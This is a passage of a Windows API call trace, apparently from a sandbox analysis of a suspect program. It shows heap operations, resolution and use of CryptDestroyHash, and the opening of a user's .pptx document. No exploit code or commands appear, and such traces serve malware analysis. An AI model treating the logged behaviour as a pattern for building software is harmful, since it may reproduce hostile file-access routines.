Size=0x10) returned 0x2e51c28 [0266.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51df0 [0266.044] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e38 [0266.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0266.044] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69988 [0266.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69988, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0266.045] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.045] CryptDestroyHash (hHash=0xa872d0) returned 1 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f14038 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0266.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51be0 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d00 | out: hHeap=0x970000) returned 1 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d48 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d18 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0266.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14038 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0266.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0266.048] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c40 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51c10 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0266.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e20 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51da8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ca0 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51f10 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e551c8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f155c8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0266.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54648 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54620 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545a8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e545f8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0266.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0266.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0266.051] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0266.051] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.051] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0266.052] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x2f04008 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0266.052] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0266.052] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents/MvKsZ2f3N9SAK.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\mvksz2f3n9sak.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0266.053] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0266.053] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0266.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0266.053] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.053] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0266.053] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0266.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0266.054] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e565e8 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0266.054] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents/" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e565e8 | out: hHeap=0x970000) returned 1 [0266.054] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0266.054] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0266.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be08a8 [0266.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0266.055] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 